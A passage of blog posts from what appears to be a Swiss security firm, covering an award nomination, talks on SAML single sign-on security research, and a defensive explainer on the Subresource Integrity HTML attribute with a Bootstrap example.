In addition the presentation introduces the Windows Bridges that will help developers to port existing mobile applications to the new platform. While a preview version for iOS (Objective C) has been made publicly available, Microsoft recently announced that the Windows Bridges for Android project has been cancelled. In the same week Microsoft announced the acquisition of Xamarin, a cross-platform development solution provider to ease the development of universal applications for the mobile platform.

The slides of the full presentation can be downloaded here.

References:

This blog post resulted from internal research which has been conducted by Alexandre Herzog and Cyrill Bannwart.

Compass Security nominated by Prix SVC

Compass Security proudly announces its nomination for the Prix SVC (Swiss Venture Club) award 2016. Out of 180 companies, Compass Security was selected as one of the most innovative companies in the eastern region of Switzerland. Because the award ceremony is being broadcasted by TVO, we had to slip into a tuxedo and play the “license to hack” story. Please watch the teaser video on YouTube!

spr_butScreen Shot 2016-02-17 at 12.04.07

The award ceremony will be held on March 10th, 2016 at the Olma Hallen in St. Gallen. We don’t yet know the final score but we will keep you updated.

Thank you for the trust and confidence you have in Compass Security!!

Walter & Ivan

 

Presentation on SAML 2.0 Security Research

Compass Security invested quite some time last year in researching the security of single sign-on (SSO) implementations. Often SAML (Security Assertion Markup Language) is used to implement a cross-domain SSO solution. The correct implementation and configuration is crucial for a secure authentication solution. As discussed in earlier blog articles, Compass Security identified vulnerabilities in SAML implementations with the SAML Burp Extension (SAML Raider) developed by Compass Security and Emanuel Duss.

Antoine Neuenschwander and Roland Bischofberger are happy to present their research results and SAML Raider during the upcoming

Beer-Talks:
– January 14, 2016, 18-19 PM, Jona
– January 21, 2016, 18-19 PM, Bern

Free entrance, food and beverage. Registration required.

Get more information in our Beer-Talk page and spread the word. The Compass Crew is looking forward to meeting you.

Subresource Integrity HTML Attribute

Websites nowadays are mostly built with different resources from other origins. For example, many sites include scripts or stylesheets like jQuery or Bootstrap from a Content Delivery Network (CDN). This induces that the webmasters implicitly trust the linked external sources. But what if an attacker can force the user to load the content from an attacker controlled server instead of the genuine resource (e.g. by DNS poisoning, or by replacing files on a CDN)? A security-aware webmaster had no chance to protect his website against such an incident.

This is the point where Subresource Integrity kicks in. Subresource Integrity ensures the integrity of external resources with an additional attribute for the two HTML tags <link> and <script>. The integrity attribute contains a cryptographic hash of the external resource which should be integrated in the site. The browser then checks if the hash of the fetched resource and the hash in the HTML attribute are identical.

Bootstrap example:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs8" crossorigin="anonymous">

In the example above, resource bootstrap.min.css is checked for its integrity with its Base64 encoded SHA-384 hash. If the integrity check is positive, the browser applies the stylesheet (or executes the script in the case of a <script> tag). If the check fails, the browser must refuse to apply the stylesheet or execute the script. The user is not informed if the check has failed and a resource therefore could not be loaded. The failed request can only be seen in the developer tools of the used browser. The following image shows the error message in the Chrome developer tools.

Console in browser does inform about subresource integrity check fail.

Console in browser does inform about subresource integrity check fail.

The crossorigin attribute in the example configures the CORS request. A value anonymous indicates, that requests for this element will not have set the credentials flag and therefore no cookies would be sent. A value of use-credentials would indicate, that the request will provide cookies to authenticate.

The subresource integrity attribute is currently being reviewed before becoming a W3C standard but is already supported by Chrome 45≤ , Firefox 43≤ and Opera 32≤.

Concluding, the subresource integrity attribute offers better possibilities for webmasters to ensure the integrity of external resources. However, this attribute is not supported by older browsers and needs to be adjusted at every resource change. In the end, a security aware webmaster will keep more control with less effort by keeping all resources hosted on his own servers.